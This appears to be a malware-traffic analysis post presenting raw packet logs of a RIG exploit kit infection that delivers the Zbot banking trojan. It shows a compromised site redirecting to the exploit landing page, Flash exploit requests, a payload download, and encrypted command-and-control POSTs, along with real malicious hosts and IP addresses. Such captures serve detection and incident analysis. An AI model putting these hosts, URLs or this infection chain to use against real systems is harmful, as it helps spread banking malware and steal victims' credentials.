RIG Exploit Kit (Flash vulnerability) delivering the Zbot banking trojan: traffic analysis and sample PCAP download

2016-08-15 16:15:47.762141 IP 192.168.4.199.49320 > 204.93.232.121.80: Flags [P.], seq 1:326, ack 1, win 16475, length 325: HTTP: GET / HTTP/1.1
E..m..@…p_…..].y…P%.{.WhI9P.@[B…GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: laspecialty.com
Connection: Keep-Alive
Cookie: c2b1b4c39b7f3382005f891501443e28=36645e4282139cae3eee4e1b46cf68f7


2016-08-15 16:15:49.603587 IP 192.168.4.199.49322 > 185.158.152.195.80: Flags [.], ack 1, win 16475, length 0
E..(..@…………….PyO0.q..NP.@[……….
2016-08-15 16:15:49.603744 IP 192.168.4.199.49322 > 185.158.152.195.80: Flags [P.], seq 1:474, ack 1, win 16475, length 473: HTTP: GET /?xXqKd7CULhrICYA=l3SKfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZXHHeU-iVvxybAdc810kROD7zRVzr9PUQlF6AoSnazJBKqE HTTP/1.1
E…..@….*………..PyO0.q..NP.@[….GET /?xXqKd7CULhrICYA=l3SKfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZXHHeU-iVvxybAdc810kROD7zRVzr9PUQlF6AoSnazJBKqE HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://laspecialty.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: hgf.houstonworkshop.com
Connection: Keep-Alive

2016-08-15 16:15:51.406088 IP 192.168.4.199.49322 > 185.158.152.195.80: Flags [.], ack 49446, win 16253, length 0
E..(..@…………….PyO5.q.osP.?}……….
2016-08-15 16:15:51.592767 IP 192.168.4.199.49322 > 185.158.152.195.80: Flags [P.], seq 1161:1805, ack 49446, win 16253, length 644: HTTP: GET /index.php?xXqKd7CULhrICYA=l3SMfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZXHHeU-iVvxybAdc810kROD7zRVzr9PUQlF6AoSnazJBKqKp0N6RgBnEB_CbJQlqw-BF3H6PXl5gv2pHn4oieWX_PB1m5AmmA HTTP/1.1
E…..@….a………..PyO5.q.osP.?};?..GET /index.php?xXqKd7CULhrICYA=l3SMfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZXHHeU-iVvxybAdc810kROD7zRVzr9PUQlF6AoSnazJBKqKp0N6RgBnEB_CbJQlqw-BF3H6PXl5gv2pHn4oieWX_PB1m5AmmA HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://hgf.houstonworkshop.com/?xXqKd7CULhrICYA=l3SKfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB
x-flash-version: 16,0,0,235
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: hgf.houstonworkshop.com
Connection: Keep-Alive

2016-08-15 16:15:51.798292 IP 192.168.4.199.49321 > 185.158.152.195.80: Flags [P.], seq 1:454, ack 1, win 16475, length 453: HTTP: GET /index.php?xXqKd7CULhrICYA=l3SMfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZXHHeU-iVvxybAdc810kROD7zRVzr9PUQlF6AoSnazJBKqKp0N6RgBnEB_CbJQlqw-fECT6PXl5gv2pHn4oieWX_PNwm5Mo3lM&dfgsdf=2907 HTTP/1.1
E…..@…………….P….`…P.@[u…GET /index.php?xXqKd7CULhrICYA=l3SMfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZXHHeU-iVvxybAdc810kROD7zRVzr9PUQlF6AoSnazJBKqKp0N6RgBnEB_CbJQlqw-fECT6PXl5gv2pHn4oieWX_PNwm5Mo3lM&dfgsdf=2907 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: hgf.houstonworkshop.com
Connection: Keep-Alive
2016-08-15 16:15:51.842908 IP 185.158.152.195.80 > 192.168.4.199.49322: Flags [.], ack 1805, win 516, length 0

2016-08-15 16:17:13.114467 IP 192.168.4.199.49331 > 115.28.36.224.80: Flags [.], ack 1, win 16475, length 0
E..(..@………s.$….P -..=IUYP.@[……….
2016-08-15 16:17:13.114681 IP 192.168.4.199.49331 > 115.28.36.224.80: Flags [P.], seq 1:414, ack 1, win 16475, length 413: HTTP: GET /copyright/files/c.c HTTP/1.1
E…..@………s.$….P -..=IUYP.@[Od..GET /copyright/files/c.c HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://hgf.houstonworkshop.com/index.php?xXqKd7CULhrICYA=l3SMfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQ
x-flash-version: 16,0,0,235
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: www.doswf.com
Connection: Keep-Alive

 

2016-08-15 16:18:13.583902 IP 192.168.4.199.49337 > 95.163.118.88.80: Flags [P.], seq 1:607, ack 1, win 16475, length 606: HTTP: POST /forum/visitcounter.php HTTP/1.1
E…..@…L …._.vX…P…..~.>P.@[.N..POST /forum/visitcounter.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: vetrogjkzoqe.site
Content-Length: 370
Connection: Keep-Alive
Cache-Control: no-cache

……=s$….F.k..xz….|.V..<..w..$YxZd..[.    \…:Yd6sI .J..).).LJ….       …`…d..WK….^……………na.7…..*…,…`rC.S9I…`…YZ`..6.a..}..rW.BGcs…H.4..A&..t……m..W..FF.yH.htL.Qk.Z….6..U.D.#.d<..h……tg.~3.RJ…..8.T!…z.’..|Hw3w..IS….}..^.q …      ……..5`..MU..$#.@..*……….P[…~….g..|..%Sz..(./8…W…..@…F3.K%..JU..d..9cl.G.s..4…….o.

2016-08-15 16:18:14.256590 IP 192.168.4.199.49338 > 95.163.118.88.80: Flags [.], ack 1, win 16475, length 0
E..(..@…Ny…._.vX…P..v.Y”..P.@[……….
2016-08-15 16:18:14.256786 IP 192.168.4.199.49338 > 95.163.118.88.80: Flags [P.], seq 1:202, ack 1, win 16475, length 201: HTTP: GET /forum/js/d.dat HTTP/1.1
E…..@…M….._.vX…P..v.Y”..P.@[Jy..GET /forum/js/d.dat HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: vetrogjkzoqe.site
Cache-Control: no-cache

2016-08-15 16:18:14.491385 IP 95.163.118.88.80 > 192.168.4.199.49338: Flags [.], ack 202, win 473, length 0

2016-08-15 16:18:15.218245 IP 192.168.4.199.49339 > 95.163.118.88.80: Flags [.], ack 1, win 16475, length 0
E..(..@…NM…._.vX…P……M{P.@[.B……..
2016-08-15 16:18:15.218394 IP 192.168.4.199.49339 > 95.163.118.88.80: Flags [P.], seq 1:202, ack 1, win 16475, length 201: HTTP: GET /forum/js/e.dat HTTP/1.1
E…..@…M….._.vX…P……M{P.@[[…GET /forum/js/e.dat HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: vetrogjkzoqe.site
Cache-Control: no-cache

2016-08-15 16:18:15.923830 IP 95.163.118.88.80 > 192.168.4.199.49339: Flags [.], seq 54170:55488, ack 202, win 473, length 1318: HTTP
E..N..@.6..E_.vX…..P….!….rP…D…
2016-08-15 16:18:15.924032 IP 192.168.4.199.49339 > 95.163.118.88.80: Flags [.], ack 55488, win 16475, length 0
E..(.B@…N#…._.vX…P…r..&:P.@[……….